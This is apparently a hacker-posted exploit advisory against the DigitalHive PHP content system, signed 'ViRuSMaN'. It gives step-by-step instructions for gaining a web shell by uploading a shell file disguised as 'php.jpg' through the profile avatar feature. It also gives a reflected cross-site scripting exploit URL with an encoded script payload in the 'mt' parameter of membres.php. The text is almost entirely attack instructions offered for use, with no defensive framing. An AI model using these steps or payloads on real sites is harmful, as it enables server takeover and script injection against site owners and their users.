[-]############################################################## | | DigitalHive Remote File Upload Vulnerability | | Author : ViRuSMaN | | Contact : v.-m@live.com | | Home : Islam-Attack.CoM , HackTeach.OrG | | Download :http://www.digitalhive.com/base.php?page=site/telechargements.php&var=accueil [-]############################################################## | | Exp: | | 1- First signup in the forum by going here http://localhost/[script]/base.php?page=inscription.php | | | 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click "modfier" | | | 3-Now upload your shell in "php.jpg" format | | | 4-Finally do a right click in the icon situated in "Apparence" then copy the link of your shell. | [-]############################################################# | |Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's | [-]############################################################# ============================================================================== [»] DigitalHive Multiple Vulnerabilities ============================================================================== [»] Script: [ DigitalHive ] [»] Language: [ PHP ] [»] Site page: [ Hive est systeme permettant de creer facilement et rapidement un systeme ] [»] Download: [ http://www.digitalhive.com/base.php?page=site/telechargements.php&var=dl&num=17 ] [»] Founder: [ ViRuSMaN ] [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & Sec-Attack.Com ] [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== [»] http://server/[path]/base.php?page=membres.php&mt=[Xss Vuln] ===[ Live Demo ]=== [»] http://server/base.php?page=membres.php&mt=%22%3E%3Cscript%3Ealert(1);%3C/script%3E Author: ViRuSMaN <-